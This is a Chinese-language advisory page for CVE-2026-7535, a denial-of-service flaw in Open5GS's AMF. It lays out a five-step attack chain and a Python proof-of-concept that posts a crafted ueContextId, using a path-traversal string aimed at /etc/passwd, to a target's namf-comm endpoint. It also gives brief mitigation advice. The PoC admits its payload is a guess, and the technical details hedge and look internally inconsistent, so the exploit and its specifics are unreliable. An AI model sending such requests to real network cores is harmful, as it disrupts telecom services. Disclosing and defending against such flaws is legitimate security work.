CVE-2026-7535 CVSS 4.3 中危

CVE-2026-7535 Open5GS拒绝服务漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7535

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS是一款开源的5G核心网软件。CVE-2026-7535是该软件中存在的一个拒绝服务漏洞，影响2.7.7及之前的版本。漏洞位于处理注册状态更新请求的函数中，攻击者可以通过恶意构造`ueContextId`参数，远程触发该漏洞，导致目标服务崩溃或不可用。由于该漏洞利用门槛较低且无需用户交互，已被公开披露，建议受影响用户尽快采取防护措施。

技术细节

该漏洞源于Open5GS的接入和移动性管理功能（AMF）组件中，在处理`namf-comm`接口的特定路径时，对输入参数`ueContextId`缺乏严格的边界检查或格式验证。具体受影响的函数位于`lib/app/ogs-init.c`文件中的`amf_namf_comm_handle_registration_status_update_request`。当攻击者通过网络向`/namf-comm/v1/ue-contexts/{ueContextId}/transfer-update`端点发送特制的HTTP请求时，恶意构造的`ueContextId`参数会导致底层处理逻辑发生错误，进而可能引发空指针解引用、缓冲区溢出或无限循环。由于该漏洞允许远程发起（AV:N）且无需用户交互（UI:N），攻击者仅需低权限即可利用此缺陷，最终导致Open5GS核心网服务进程崩溃，造成严重的拒绝服务状态。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露的Open5GS AMF接口（端口80/443或特定SBI端口）。

STEP 2

构造载荷

攻击者针对`ueContextId`参数构造恶意的HTTP请求，该参数用于`/namf-comm/v1/ue-contexts/{ueContextId}/transfer-update`接口。

STEP 3

发起攻击

攻击者通过网络向目标Open5GS服务器发送包含恶意参数的请求。

STEP 4

利用漏洞

Open5GS在解析`ueContextId`时触发逻辑错误，导致`ogs-init.c`中的处理函数崩溃。

STEP 5

达成影响

Open5GS服务停止响应，造成5G核心网功能瘫痪，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-7535 Open5GS DoS PoC
# This script attempts to trigger the DoS by sending a malformed ueContextId.

target_url = "http://target-open5gs:80/namf-comm/v1/ue-contexts/{ueContextId}/transfer-update"

# Malicious payload for ueContextId
# Specific value depends on the exact parsing flaw, usually long string or special chars
malicious_ueContextId = "../../../etc/passwd"  # Example pattern or long string

try:
    # Sending the malicious request
    print(f"Sending payload to: {target_url.format(ueContextId=malicious_ueContextId)}")
    response = requests.post(target_url.format(ueContextId=malicious_ueContextId), timeout=5)
    print(f"Request sent with status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"Target appears down (DoS successful?): {e}")

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

在官方发布修复补丁之前，建议管理员严格限制访问Open5GS AMF接口的网络IP地址，仅允许内部网元通信，并监控日志中是否存在针对`/namf-comm/v1/ue-contexts/`路径的异常请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7535
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7535
3 Details https://www.cvedetails.com/cve/CVE-2026-7535/
4 VulDB https://vuldb.com/cve/CVE-2026-7535
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4399
7 Link https://vuldb.com/submit/804291
8 Link https://vuldb.com/submit/804303
9 Link https://vuldb.com/vuln/360352
10 Link https://vuldb.com/vuln/360352/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表